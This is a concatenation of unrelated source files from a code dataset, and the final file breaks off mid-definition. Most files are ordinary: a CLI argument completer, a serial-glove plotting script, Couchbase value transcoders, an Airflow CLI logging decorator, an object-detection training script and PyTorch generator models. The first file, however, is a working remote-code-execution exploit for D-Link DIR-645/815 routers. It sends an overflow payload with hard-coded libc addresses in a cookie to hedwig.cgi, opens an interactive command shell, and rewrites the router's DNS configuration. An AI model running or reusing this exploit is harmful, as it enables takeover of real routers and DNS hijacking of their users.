4a1e4f530d76885c544a70687c8b26c8ff21048d | 5,058 | py | Python | EXP/dir_645_rce.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | ["Apache-2.0"] | 2 | 2019-05-19T11:54:26.000Z | 2019-05-19T12:03:49.000Z | EXP/dir_645_rce.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | ["Apache-2.0"] | 1 | 2020-11-27T07:55:15.000Z | 2020-11-27T07:55:15.000Z | EXP/dir_645_rce.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | ["Apache-2.0"] | 2 | 2021-09-06T18:06:12.000Z | 2021-12-31T07:44:43.000Z |
#coding: utf-8
'''
@Test list:
DIR 645 A1 1.01
DIR 815 1.01
'''
import string
import random
import datetime
import struct
from routelib import *
from exp_template import *
class dir_645_rce(Exploit):
def __init__(self, url, taskid=0, targetid=0, cmd_connect='', data_redirect='', dns_server='', proxies={}):
self.url = url
self.taskid = taskid
self.targetid = targetid
self.cmd_connect = cmd_connect
self.data_redirect = data_redirect
self.dns_server = dns_server
self.proxies = proxies
self.log_data = []
self.shell_data = []
def meta_info(self):
return {
'name': 'dir_645_rce',
'author': 'z',
'date': '2018-03-15',
'attack_type': 'RCE',
            'app_type': 'Router', # use 'Router' for routers
'app_name': 'D-Link',
'min_version': '',
'max_version': '',
            'version_list': ['DIR-645'], # either min_version/max_version or version_list is required
'description': 'Module exploits D-Link DIR-645 and DIR-600 and DIR-815 and DIR-300 buffer overflow that leads to remote code execution',
'reference':[
'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008',
'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000',
'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt',
'https://www.exploit-db.com/exploits/27283/'
            ], # reference documents
}
def exploit(self):
if self.check():
self.report("Target is vulnerable")
self.report("DNS Poisoning...")
#self.command_stager()
self.dns_poison(self.dns_server)
else:
self.report("Target is not vulnerable",Level.warming)
self.report('Exploit is complete')
def dns_poison(self,new_dns_server='192.168.220.5', dns_conf_path='/var/servd/DNS.conf', restart_cmd='"dnsmasq -C /var/servd/DNS.conf"'):
every_send = 30
completed = 0
dns_handle = dns.dnsmasq_poison(self.dns_server)
#dns_handle.set_debug_mode()
dns_shell = dns_handle.get_dns_poison_shell_cmds(every_send)
wf = dns_shell['script_name']
total_size = dns_shell['size']
for cmd in dns_shell['cmds']:
completed += every_send
self.execute(cmd)
if completed >= total_size:
completed = total_size
self.report('Command Stager progress - %.2f%% done (%d/%d) bytes' % (float(completed)/total_size*100, completed, total_size))
chmod_dns_shell = 'chmod +x %s && echo' % wf
#execute_dns_shell = '%s %s %s %s && echo' % (wf,dns_conf_path,new_dns_server,restart_cmd)
execute_dns_shell = '%s && echo' % (wf)
self.report('Command: "%s" done.' % chmod_dns_shell)
self.execute(chmod_dns_shell)
#print execute_dns_shell
self.report('Command: "%s" done.' % execute_dns_shell)
result = self.execute(execute_dns_shell)
def command_stager(self):
while True:
cmd = raw_input("# ")
if cmd in ['exit', 'quit']:
return
self.report(self.execute(cmd))
def execute(self, cmd):
req = session()
libcbase = 0x2aaf8000
system = 0x000531FF
calcsystem = 0x000158C8
callsystem = 0x000159CC
shellcode = random_text(973)
shellcode += struct.pack("<I", libcbase + system)
shellcode += random_text(16)
shellcode += struct.pack("<I", libcbase + callsystem)
shellcode += random_text(12)
shellcode += struct.pack("<I", libcbase + calcsystem)
shellcode += random_text(16)
shellcode += cmd
url = "{}/hedwig.cgi".format(self.url)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'uid': shellcode}
data = random_text(7) + "=" + random_text(7)
response = None
try:
response = req.post(url=url, headers=headers, data=data, cookies=cookies)
except requests.Timeout as err:
pass
self.report(err.message,Level.warming)
except requests.ConnectionError as err:
pass
self.report(err.message,Level.warming)
if response is None:
return ""
return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
def check(self):
fingerprint = random_text(10)
cmd = "echo {}".format(fingerprint)
response = self.execute(cmd)
if fingerprint in response:
return True
return False
if __name__ == "__main__":
import sys
if len(sys.argv) < 3:
print 'Usage(e.g.): dir_645_rce.py http://192.168.0.1:8080 119.6.6.6'
exit(0)
e = dir_645_rce(sys.argv[1],dns_server=sys.argv[2])
e.exploit()
| 35.619718 | 148 | 0.580071 |
4a1e500d72f09c964cd9388bb3ea947106d64d3c | 739 | py | Python | tools/paconn-cli/paconn/completer.py | amoedo/PowerPlatformConnectors | dbf436b3a2cc02a4231b60b232a696e734d81c55 | ["MIT"] | 454 | 2019-05-07T17:58:24.000Z | 2022-03-31T23:20:04.000Z | tools/paconn-cli/paconn/completer.py | amoedo/PowerPlatformConnectors | dbf436b3a2cc02a4231b60b232a696e734d81c55 | ["MIT"] | 830 | 2019-05-11T10:32:44.000Z | 2022-03-31T18:23:42.000Z | tools/paconn-cli/paconn/completer.py | amoedo/PowerPlatformConnectors | dbf436b3a2cc02a4231b60b232a696e734d81c55 | ["MIT"] | 753 | 2019-05-11T09:49:56.000Z | 2022-03-31T15:53:52.000Z |
# -----------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -----------------------------------------------------------------------------
"""
Defines argument completer
"""
# pylint: disable=too-few-public-methods
class Completer:
"""
Argument completer object
"""
def __init__(self, func):
self.func = func
def __call__(self, **kwargs):
namespace = kwargs['parsed_args']
prefix = kwargs['prefix']
cmd = namespace._cmd # pylint: disable=protected-access
return self.func(cmd, prefix, namespace)
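# Illustrative sketch (added for clarity, not part of the original module):
# wrapping a completion function with Completer. The candidate values are
# hypothetical.
def _example_environment_completer(cmd, prefix, namespace):
    return [env for env in ('dev', 'test', 'prod') if env.startswith(prefix)]
example_environment_completer = Completer(_example_environment_completer)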
| 29.56 | 79 | 0.525034 |
4a1e55336c7da63d00b8583a50dfebd634cf3238 | 2,390 | py | Python | lerp_finger_from_serial.py | LittleNyanCat/pygloves | d5881bf3eaf90a185243abe3e366005066c656cd | ["MIT"] | 2 | 2021-12-30T18:30:56.000Z | 2022-03-09T10:48:57.000Z | lerp_finger_from_serial.py | LittleNyanCat/pygloves | d5881bf3eaf90a185243abe3e366005066c656cd | ["MIT"] | null | null | null | lerp_finger_from_serial.py | LittleNyanCat/pygloves | d5881bf3eaf90a185243abe3e366005066c656cd | ["MIT"] | 1 | 2022-03-26T13:46:54.000Z | 2022-03-26T13:46:54.000Z |
import multiprocessing
import re
import serial
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
import bone
import serial_utils as s
# Use device manager to find the Arduino's serial port.
COM_PORT = "COM4"
MAX_SERIAL_VALUE = 4095 # maximum expected value coming from serial; set to 1023 if using an older Arduino instead of an ESP32
RESET_SCALE = True
LEGACY_DECODE = False # If false, will use alpha encodings
q = multiprocessing.Queue()
# Plot Setup
fig = plt.figure("Serial Finger Plots")
ax = fig.add_subplot(111, projection='3d')
plt.subplots_adjust(left=0.25, bottom=0.25)
ax.set_xlabel('X [m]')
ax.set_ylabel('Y [m]')
ax.set_zlabel('Z [m]')
# Set the scale once
ax.set_xlim3d([-0.05, 0.1])
ax.set_ylim3d([-0.1, 0.1])
ax.set_zlim3d([0, 0.2])
ax.view_init(elev=25, azim=-150)
# ------------ Serial Setup ---------------
def serial_worker(q, COM_PORT):
ser = serial.Serial(COM_PORT,'115200', timeout=1) # open serial port
print("Listening on "+COM_PORT)
while True:
try:
# Read from serial
read = ser.readline()
if LEGACY_DECODE:
fingers = s.decode_legacy_serial(read)
else:
fingers = s.decode_alpha_serial(read)
# Add the decoded values to the queue
q.put(fingers)
except KeyboardInterrupt:
print("Quitting thread...")
ser.close()
quit()
def animate(i):
fingers = [0,0,0,0,0]
while not(q.empty()):
fingers = list(q.get())
# Plot
ax.clear()
ax.set_xlabel('X [mm]')
ax.set_ylabel('Y [mm]')
ax.set_zlabel('Z [mm]')
if (RESET_SCALE == True):
ax.set_xlim3d([-0.05, 0.1])
ax.set_ylim3d([-0.1, 0.1])
ax.set_zlim3d([0, 0.2])
# Turn finger values into Lerp Vals
thumb_val = fingers[0] / MAX_SERIAL_VALUE
index_val = fingers[1] / MAX_SERIAL_VALUE
middle_val = fingers[2] / MAX_SERIAL_VALUE
ring_val = fingers[3] / MAX_SERIAL_VALUE
pinky_val = fingers[4] / MAX_SERIAL_VALUE
print("Fingers", fingers)
fingers = [thumb_val, index_val, middle_val, ring_val, pinky_val]
# Lerp the right hand
points = bone.lerp_fingers(fingers, bone.right_open_pose, bone.right_fist_pose)
# Plot the Points
bone.plot_steam_hand(points, "Lerped Pose", ax)
if __name__ == "__main__":
p = multiprocessing.Process(target=serial_worker, args=(q,COM_PORT, ), daemon=True)
p.start()
anim = animation.FuncAnimation(fig, animate, blit=False, interval=1)
try:
plt.show()
except KeyboardInterrupt:
    quit()
| 27.471264 | 124 | 0.707531 |
4a1e56c1f83b33a761fc2ea39cf6735e926d2346 | 8,962 | py | Python | couchbase/transcoder.py | couchbase/couchbase-python-client | 99ec055835f5aef0cd07905497b3ab4bb3cbbc32 | ["Apache-2.0"] | 189 | 2015-01-07T18:34:31.000Z | 2022-03-21T17:41:56.000Z | couchbase/transcoder.py | couchbase/couchbase-python-client | 99ec055835f5aef0cd07905497b3ab4bb3cbbc32 | ["Apache-2.0"] | 24 | 2015-05-19T14:00:16.000Z | 2022-03-16T22:01:30.000Z | couchbase/transcoder.py | couchbase/couchbase-python-client | 99ec055835f5aef0cd07905497b3ab4bb3cbbc32 | ["Apache-2.0"] | 60 | 2015-03-10T22:12:50.000Z | 2022-03-07T21:57:40.000Z |
import json
import pickle
from typing import Any, Tuple, Union
from abc import ABC, abstractmethod
from couchbase.exceptions import ValueFormatException
from couchbase_core._libcouchbase import (Transcoder, FMT_JSON,
FMT_BYTES, FMT_UTF8, FMT_PICKLE,
FMT_LEGACY_MASK, FMT_COMMON_MASK)
UNIFIED_FORMATS = (FMT_JSON, FMT_BYTES, FMT_UTF8, FMT_PICKLE)
LEGACY_FORMATS = tuple([x & FMT_LEGACY_MASK for x in UNIFIED_FORMATS])
COMMON_FORMATS = tuple([x & FMT_COMMON_MASK for x in UNIFIED_FORMATS])
COMMON2UNIFIED = {}
LEGACY2UNIFIED = {}
for fl in UNIFIED_FORMATS:
COMMON2UNIFIED[fl & FMT_COMMON_MASK] = fl
LEGACY2UNIFIED[fl & FMT_LEGACY_MASK] = fl
def get_decode_format(flags):
"""
    Return the format to use for decoding, based on the flags; unrecognized formats fall back to FMT_BYTES.
"""
c_flags = flags & FMT_COMMON_MASK
l_flags = flags & FMT_LEGACY_MASK
if c_flags:
# if unknown format, default to FMT_BYTES
return COMMON2UNIFIED.get(c_flags, FMT_BYTES)
else:
# if unknown format, default to FMT_BYTES
return LEGACY2UNIFIED.get(l_flags, FMT_BYTES)
class Transcoder(ABC):
"""Interface a Custom Transcoder must implement
"""
@abstractmethod
def encode_value(self, # type: "Transcoder"
value # type: Any
) -> Tuple[bytes, int]:
pass
@abstractmethod
def decode_value(self, # type: "Transcoder"
value, # type: bytes
flags # type: int
) -> Any:
pass
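# Illustrative sketch (added for clarity, not part of the original module): a
# custom transcoder that pickles every value and tags it with FMT_PICKLE.
class ExamplePickleTranscoder(Transcoder):
    def encode_value(self, value):
        # Serialize with pickle and tag the stored value so decode_value can
        # recognize the format later.
        return pickle.dumps(value), FMT_PICKLE
    def decode_value(self, value, flags):
        if get_decode_format(flags) != FMT_PICKLE:
            raise ValueFormatException("Expected pickled data")
        return pickle.loads(value)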
class JSONTranscoder(Transcoder):
def encode_value(self, # type: "JSONTranscoder"
value, # type: Any
) -> Tuple[bytes, int]:
if isinstance(value, str):
format = FMT_JSON
elif isinstance(value, (bytes, bytearray)):
raise ValueError(
"The JSONTranscoder (default transcoder) does not support binary data.")
elif isinstance(value, (list, tuple, dict, bool, int, float)) or value is None:
format = FMT_JSON
else:
raise ValueFormatException(
"Unrecognized value type {}".format(type(value)))
if format != FMT_JSON:
raise ValueFormatException("Unrecognized format {}".format(format))
return json.dumps(value, ensure_ascii=False).encode("utf-8"), FMT_JSON
def decode_value(self, # type: "JSONTranscoder"
value, # type: bytes
flags # type: int
) -> Any:
format = get_decode_format(flags)
if format == FMT_BYTES:
raise ValueFormatException(
"The JSONTranscoder (default transcoder) does not support binary format")
elif format == FMT_UTF8:
raise ValueFormatException(
"The JSONTranscoder (default transcoder) does not support string format")
elif format == FMT_JSON:
return json.loads(value.decode('utf-8'))
else:
raise ValueFormatException(
"Unrecognized format provided: {}".format(format))
class RawJSONTranscoder(Transcoder):
def encode_value(self, # type: "RawJSONTranscoder"
value # type: Union[str,bytes,bytearray]
) -> Tuple[bytes, int]:
if isinstance(value, str):
return value.encode("utf-8"), FMT_JSON
elif isinstance(value, (bytes, bytearray)):
if isinstance(value, bytearray):
value = bytes(value)
return value, FMT_JSON
else:
raise ValueFormatException(
"Only binary and string data supported by RawJSONTranscoder")
def decode_value(self, # type: "RawJSONTranscoder"
value, # type: bytes
flags # type: int
) -> Union[str, bytes]:
format = get_decode_format(flags)
if format == FMT_BYTES:
raise ValueFormatException(
"Binary format type not supported by RawJSONTranscoder")
elif format == FMT_UTF8:
raise ValueFormatException(
"String format type not supported by RawJSONTranscoder")
elif format == FMT_JSON:
if isinstance(value, str):
return value.decode("utf-8")
elif isinstance(value, (bytes, bytearray)):
if isinstance(value, bytearray):
value = bytes(value)
return value
else:
raise ValueFormatException(
"Only binary and string data supported by RawJSONTranscoder")
else:
raise ValueError("Unexpected flags value.")
class RawStringTranscoder(Transcoder):
def encode_value(self, # type: "RawStringTranscoder"
value # type: str
) -> Tuple[bytes, int]:
if isinstance(value, str):
return value.encode("utf-8"), FMT_UTF8
else:
raise ValueFormatException(
"Only string data supported by RawStringTranscoder")
def decode_value(self, # type: "RawStringTranscoder"
value, # type: bytes
flags # type: int
) -> Union[str, bytes]:
format = get_decode_format(flags)
if format == FMT_BYTES:
raise ValueFormatException(
"Binary format type not supported by RawStringTranscoder")
elif format == FMT_UTF8:
return value.decode("utf-8")
elif format == FMT_JSON:
raise ValueFormatException(
"JSON format type not supported by RawStringTranscoder")
else:
raise ValueError("Unexpected flags value.")
class RawBinaryTranscoder(Transcoder):
def encode_value(self, # type: "RawBinaryTranscoder"
value # type: Union[bytes,bytearray]
) -> Tuple[bytes, int]:
if isinstance(value, (bytes, bytearray)):
if isinstance(value, bytearray):
value = bytes(value)
return value, FMT_BYTES
else:
raise ValueFormatException(
"Only binary data supported by RawBinaryTranscoder")
def decode_value(self, # type: "RawBinaryTranscoder"
value, # type: bytes
flags # type: int
) -> bytes:
format = get_decode_format(flags)
if format == FMT_BYTES:
if isinstance(value, bytearray):
value = bytes(value)
return value
elif format == FMT_UTF8:
raise ValueFormatException(
"String format type not supported by RawBinaryTranscoder")
elif format == FMT_JSON:
raise ValueFormatException(
"JSON format type not supported by RawBinaryTranscoder")
else:
raise ValueError("Unexpected flags value.")
class LegacyTranscoder(Transcoder):
def encode_value(self, # type: "LegacyTranscoder"
value # type: Any
) -> Tuple[bytes, int]:
if isinstance(value, str):
format = FMT_UTF8
elif isinstance(value, (bytes, bytearray)):
format = FMT_BYTES
elif isinstance(value, (list, tuple, dict, bool, int, float)) or value is None:
format = FMT_JSON
else:
format = FMT_PICKLE
if format == FMT_BYTES:
if isinstance(value, bytes):
pass
elif isinstance(value, bytearray):
value = bytes(value)
else:
raise ValueFormatException("Expected bytes")
return value, format
elif format == FMT_UTF8:
return value.encode('utf-8'), format
elif format == FMT_PICKLE:
return pickle.dumps(value), FMT_PICKLE
elif format == FMT_JSON:
return json.dumps(value, ensure_ascii=False).encode("utf-8"), FMT_JSON
else:
raise ValueFormatException("Unrecognized format {}".format(format))
def decode_value(self, # type: "LegacyTranscoder"
value, # type: bytes
flags # type: int
) -> Any:
format = get_decode_format(flags)
if format == FMT_BYTES:
return value
elif format == FMT_UTF8:
return value.decode("utf-8")
elif format == FMT_JSON:
try:
return json.loads(value.decode('utf-8'))
except Exception:
# if error encountered, assume return bytes
return value
elif format == FMT_PICKLE:
return pickle.loads(value)
else:
# default to returning bytes
return value
| 33.818868 | 89 | 0.564048 |
4a1e575e18ccd76104a0fbd3f3120e8d4a2705b7 | 6,039 | py | Python | mlx/od/archive/fastai/train.py | lewfish/mlx | 027decf72bf9d96de3b4de13dcac7b352b07fd63 | ["Apache-2.0"] | null | null | null | mlx/od/archive/fastai/train.py | lewfish/mlx | 027decf72bf9d96de3b4de13dcac7b352b07fd63 | ["Apache-2.0"] | null | null | null | mlx/od/archive/fastai/train.py | lewfish/mlx | 027decf72bf9d96de3b4de13dcac7b352b07fd63 | ["Apache-2.0"] | null | null | null |
import json
import uuid
from os.path import join, isdir, dirname
import shutil
import tempfile
import os
import numpy as np
import click
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import fastai
from fastai.vision import (
get_annotations, ObjectItemList, get_transforms,
bb_pad_collate, URLs, untar_data, imagenet_stats, flip_affine)
from fastai.basic_train import Learner
import torch
from torch import nn, Tensor
from fastai.callback import CallbackHandler
from fastai.callbacks import TrackEpochCallback
from fastai.core import ifnone
from fastai.torch_core import OptLossFunc, OptOptimizer, Optional, Tuple, Union
from mlx.od.metrics import CocoMetric
from mlx.od.callbacks import (
MyCSVLogger, SyncCallback, TensorboardLogger,
SubLossMetric, MySaveModelCallback)
from mlx.od.data import setup_output_dir, build_databunch
from mlx.od.config import load_config
from mlx.od.boxlist import BoxList, to_box_pixel
from mlx.od.model import build_model
from mlx.filesystem.utils import sync_to_dir
from mlx.od.fcos.model import FCOS
from mlx.od.plot import build_plotter
# Modified from fastai to handle model which only computes loss when targets
# are passed in, and only computes output otherwise. This should run faster
# thanks to not having to run the decoder and NMS during training, and not
# computing the loss for the validation which is not a great metric anyway.
# This also converts the input format.
def loss_batch(model:nn.Module, xb:Tensor, yb:Tensor, loss_func:OptLossFunc=None,
opt:OptOptimizer=None,
cb_handler:Optional[CallbackHandler]=None)->Tuple[Union[Tensor,int,float,str]]:
"Calculate loss and metrics for a batch, call out to callbacks as necessary."
cb_handler = ifnone(cb_handler, CallbackHandler())
device = xb.device
# Translate from fastai box format to torchvision.
batch_sz = len(xb)
images = xb
targets = []
for i in range(batch_sz):
boxes = yb[0][i]
labels = yb[1][i]
boxes = to_box_pixel(boxes, *images[0].shape[1:3])
targets.append(BoxList(boxes, labels=labels))
out = None
loss = torch.Tensor([0.0]).to(device=device)
if model.training:
loss_dict = model(images, targets)
loss = loss_dict['total_loss']
cb_handler.state_dict['loss_dict'] = loss_dict
else:
out = model(images)
out = cb_handler.on_loss_begin(out)
if opt is not None:
loss,skip_bwd = cb_handler.on_backward_begin(loss)
if not skip_bwd: loss.backward()
if not cb_handler.on_backward_end(): opt.step()
if not cb_handler.on_step_end(): opt.zero_grad()
return loss.detach().cpu()
@click.command()
@click.argument('config_path')
@click.argument('opts', nargs=-1)
def train(config_path, opts):
tmp_dir_obj = tempfile.TemporaryDirectory()
tmp_dir = tmp_dir_obj.name
cfg = load_config(config_path, opts)
print(cfg)
# Setup data
databunch, full_databunch = build_databunch(cfg, tmp_dir)
output_dir = setup_output_dir(cfg, tmp_dir)
print(full_databunch)
plotter = build_plotter(cfg)
if not cfg.lr_find_mode and not cfg.predict_mode:
plotter.plot_data(databunch, output_dir)
# Setup model
num_labels = databunch.c
model = build_model(cfg, num_labels)
metrics = [CocoMetric(num_labels)]
learn = Learner(databunch, model, path=output_dir, metrics=metrics)
fastai.basic_train.loss_batch = loss_batch
best_model_path = join(output_dir, 'best_model.pth')
last_model_path = join(output_dir, 'last_model.pth')
# Train model
callbacks = [
MyCSVLogger(learn, filename='log'),
SubLossMetric(learn, model.subloss_names)
]
if cfg.output_uri.startswith('s3://'):
callbacks.append(
SyncCallback(output_dir, cfg.output_uri, cfg.solver.sync_interval))
if cfg.model.init_weights:
device = next(model.parameters()).device
model.load_state_dict(
torch.load(cfg.model.init_weights, map_location=device))
if not cfg.predict_mode:
if cfg.overfit_mode:
learn.fit_one_cycle(cfg.solver.num_epochs, cfg.solver.lr, callbacks=callbacks)
torch.save(learn.model.state_dict(), best_model_path)
learn.model.eval()
print('Validating on training set...')
learn.validate(full_databunch.train_dl, metrics=metrics)
else:
tb_logger = TensorboardLogger(learn, 'run')
tb_logger.set_extra_args(
model.subloss_names, cfg.overfit_mode)
extra_callbacks = [
MySaveModelCallback(
learn, best_model_path, monitor='coco_metric', every='improvement'),
MySaveModelCallback(learn, last_model_path, every='epoch'),
TrackEpochCallback(learn),
]
callbacks.extend(extra_callbacks)
if cfg.lr_find_mode:
learn.lr_find()
learn.recorder.plot(suggestion=True, return_fig=True)
lr = learn.recorder.min_grad_lr
print('lr_find() found lr: {}'.format(lr))
exit()
learn.fit_one_cycle(cfg.solver.num_epochs, cfg.solver.lr, callbacks=callbacks)
print('Validating on full validation set...')
learn.validate(full_databunch.valid_dl, metrics=metrics)
else:
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.load_state_dict(
torch.load(join(output_dir, 'best_model.pth'), map_location=device))
model.eval()
        print('Plotting predictions...')
        plot_dataset = databunch.train_ds if cfg.overfit_mode else databunch.valid_ds
plotter.make_debug_plots(plot_dataset, model, databunch.classes, output_dir)
if cfg.output_uri.startswith('s3://'):
sync_to_dir(output_dir, cfg.output_uri)
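# Illustrative invocation (hypothetical config path and override tokens):
#   python train.py configs/fcos.yml solver.num_epochs 10 solver.lr 1e-4
# click forwards the trailing OPTS tokens to load_config() as overrides.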
if __name__ == '__main__':
train() | 37.04908 | 94 | 0.688028 |
4a1e57a062b4bb92b933636cacd35d81e6f8a6a3 | 4,171 | py | Python | airflow/utils/cli.py | abhishek-ch/incubator-airflow | 3358551c8e73d9019900f7a85f18ebfd88591450 | [
"Apache-2.0"
] | 4 | 2015-11-12T10:58:54.000Z | 2017-08-05T06:41:36.000Z | airflow/utils/cli.py | abhishek-ch/incubator-airflow | 3358551c8e73d9019900f7a85f18ebfd88591450 | [
"Apache-2.0"
] | 9 | 2016-01-14T18:06:48.000Z | 2018-10-02T16:32:51.000Z | airflow/utils/cli.py | abhishek-ch/incubator-airflow | 3358551c8e73d9019900f7a85f18ebfd88591450 | [
"Apache-2.0"
] | 2 | 2015-12-14T11:38:49.000Z | 2018-03-26T15:03:07.000Z | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
Utilities module for cli
"""
from __future__ import absolute_import
import functools
import getpass
import json
import socket
import sys
from argparse import Namespace
from datetime import datetime
import airflow.models
from airflow.utils import cli_action_loggers
def action_logging(f):
"""
    Decorates a cli function so that registered action loggers are invoked
    around its execution. The action logger callbacks are called twice:
    once for pre-execution and once for post-execution.
Action logger will be called with below keyword parameters:
sub_command : name of sub-command
start_datetime : start datetime instance by utc
end_datetime : end datetime instance by utc
full_command : full command line arguments
user : current user
log : airflow.models.Log ORM instance
dag_id : dag id (optional)
task_id : task_id (optional)
execution_date : execution date (optional)
error : exception instance if there's an exception
:param f: function instance
:return: wrapped function
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
        A wrapper for cli functions. It assumes the 1st positional argument
        is a Namespace instance.
        :param args: Positional arguments. The 1st one is assumed to be a
            Namespace instance
        :param kwargs: Passthrough keyword arguments
"""
assert args
assert isinstance(args[0], Namespace), \
"1st positional argument should be argparse.Namespace instance, " \
"but {}".format(args[0])
metrics = _build_metrics(f.__name__, args[0])
cli_action_loggers.on_pre_execution(**metrics)
try:
return f(*args, **kwargs)
except Exception as e:
metrics['error'] = e
raise
finally:
metrics['end_datetime'] = datetime.utcnow()
cli_action_loggers.on_post_execution(**metrics)
return wrapper
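# Illustrative sketch (not part of the original module): a hypothetical cli
# command decorated with @action_logging. The wrapped function must take an
# argparse.Namespace as its 1st positional argument; its optional dag_id,
# task_id and execution_date attributes end up in the metrics dict passed to
# the registered pre/post execution callbacks.
@action_logging
def _example_cli_command(args):
    """Toy command, invoked like:
    _example_cli_command(Namespace(dag_id='d', task_id='t', execution_date=None))
    """
    return "would run task {} of dag {}".format(args.task_id, args.dag_id)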
def _build_metrics(func_name, namespace):
"""
Builds metrics dict from function args
It assumes that function arguments is from airflow.bin.cli module's function
and has Namespace instance where it optionally contains "dag_id", "task_id",
and "execution_date".
:param func_name: name of function
:param namespace: Namespace instance from argparse
:return: dict with metrics
"""
metrics = {'sub_command': func_name}
metrics['start_datetime'] = datetime.utcnow()
metrics['full_command'] = '{}'.format(list(sys.argv))
metrics['user'] = getpass.getuser()
assert isinstance(namespace, Namespace)
tmp_dic = vars(namespace)
metrics['dag_id'] = tmp_dic.get('dag_id')
metrics['task_id'] = tmp_dic.get('task_id')
metrics['execution_date'] = tmp_dic.get('execution_date')
metrics['host_name'] = socket.gethostname()
extra = json.dumps(dict((k, metrics[k]) for k in ('host_name', 'full_command')))
log = airflow.models.Log(
event='cli_{}'.format(func_name),
task_instance=None,
owner=metrics['user'],
extra=extra,
task_id=metrics.get('task_id'),
dag_id=metrics.get('dag_id'),
execution_date=metrics.get('execution_date'))
metrics['log'] = log
return metrics
| 34.758333 | 85 | 0.686166 |
4a1e58c1c0de2e7ffa5b90d81b1ff5ff32677e8e | 7,968 | py | Python | models.py | Sriram-Ravula/CLIP_Decoder | 33e07cee1fa1cc41395b8cd027b8e24222ef59e3 | [
"MIT"
] | 2 | 2021-06-04T17:39:46.000Z | 2022-03-26T02:55:01.000Z | models.py | Sriram-Ravula/CLIP_Decoder | 33e07cee1fa1cc41395b8cd027b8e24222ef59e3 | [
"MIT"
] | null | null | null | models.py | Sriram-Ravula/CLIP_Decoder | 33e07cee1fa1cc41395b8cd027b8e24222ef59e3 | [
"MIT"
] | null | null | null | import torch.nn as nn
from non_local import NLBlockND
class Generator(nn.Module):
def __init__(self, ngf, nz, nc = 3):
super(Generator, self).__init__()
self.ngf = ngf
self.nz = nz
self.nc = nc
first_chans = nz // 49 + 1 #The number of channels to reshape the input code to
#First project the [N, nz] tensor to [N, 7*7*first_chans]
self.project = nn.Linear(in_features=nz, out_features=7*7*first_chans, bias=False)
#Here we must reshape the tensor to [N, first_chans, 7, 7]
self.deepen = nn.Conv2d(first_chans, ngf * 16, kernel_size=1, stride=1, padding=0, bias=False)
self.main = nn.Sequential(
#Input: [N, ngf * 16, 7, 7]
nn.ConvTranspose2d(ngf * 16, ngf * 8, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf * 8),
nn.ReLU(),
#Input: [N, ngf * 8, 14, 14]
nn.ConvTranspose2d(ngf * 8, ngf * 4, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf * 4),
nn.ReLU(),
#Input: [N, ngf * 4, 28, 28]
nn.ConvTranspose2d(ngf * 4, ngf* 2, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf * 2),
nn.ReLU(),
#Input: [N, ngf * 2, 56, 56]
nn.ConvTranspose2d(ngf * 2, ngf, kernel_size=4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(ngf),
nn.ReLU(),
#Input: [N, ngf, 112, 112]
nn.ConvTranspose2d(ngf, nc, kernel_size=4, stride=2, padding=1, bias=False)
            #Output: [N, nc, 224, 224]
)
def forward(self, x):
N = x.size(0)
x = self.project(x)
x = self.deepen(x.view(N, -1, 7, 7))
x = self.main(x)
return x
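# Shape-check sketch (not part of the original file): verifies that Generator
# maps an [N, nz] latent code to an [N, nc, 224, 224] image. The ngf/nz values
# below are arbitrary; torch is imported locally because the module only
# imports torch.nn at the top.
def _check_generator_shapes():
    import torch
    net = Generator(ngf=8, nz=128, nc=3)
    z = torch.randn(2, 128)
    out = net(z)
    assert out.shape == (2, 3, 224, 224), out.shape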
class Generator2(nn.Module):
def __init__(self, ngf, nz, nc = 3):
super(Generator2, self).__init__()
self.ngf = ngf
self.nz = nz
self.nc = nc
#input: [N, nz] --> reshape [N, nz, 1, 1]
#input: [N, nz, 1, 1] --> [N, 7*7* ngf*32, 1, 1]
#self.input = nn.Conv2d(nz, 7 * 7 * ngf*32, kernel_size=1, stride=1, padding=0, bias=False)
self.project = nn.Linear(in_features=nz, out_features=7*7*ngf*32, bias=False)
#input: [N, 7*7*ngf*32, 1, 1] --> reshape [N, ngf*32, 7, 7]
self.main = nn.Sequential(
#Input: [N, ngf * 32, 7, 7]
nn.BatchNorm2d(ngf * 32),
nn.ReLU(),
#Input: [N, ngf * 32, 7, 7]
nn.Conv2d(ngf * 32, ngf * 16, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 16),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 16, 14, 14]
nn.Conv2d(ngf * 16, ngf * 8, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 8),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 8, 28, 28]
nn.Conv2d(ngf * 8, ngf* 4, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 4),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 4, 56, 56]
